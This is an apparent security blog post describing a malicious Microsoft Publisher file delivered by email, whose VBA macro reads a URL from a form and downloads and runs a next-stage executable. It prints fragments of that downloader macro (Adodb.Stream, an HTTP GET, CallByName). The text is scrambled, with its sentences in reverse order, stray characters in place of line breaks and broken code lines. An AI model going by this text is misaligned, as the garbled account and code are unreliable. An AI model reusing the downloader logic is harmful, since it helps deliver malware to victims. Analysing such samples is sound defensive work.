Once the PE file downloaded and executed, it performs the following tasks: MsOfficeOnlineLeague.Open "GET",, FalseĬallByName xpsa, +, _ The file contained a simple VBA macro that reads the URL to download the next stage via a VBA Form:ĭim msOfficeOnlineLeague: Set msOfficeOnlineLeague = CreateObject(UserForm1.Tag)ĭim xpsa: Set xpsa = CreateObject("Adodb.Stream") One of our readers shared a malicious Publisher document that he received via email. If not very popular these days, Publisher is still installed on many computers because the default setup of Office 365 proposes it by default:īeing part of Office 365, it has all the features like Word, Excel, etc (Read: it can execute VBA macros). Publisher is a low-level desktop publishing application offered by Microsoft in its Office suite. A few days ago, Microsoft Publisher malicious files were spotted by security researchers. Attackers are always searching for new ways to deliver malicious content to their victims.
0 Comments
Leave a Reply. |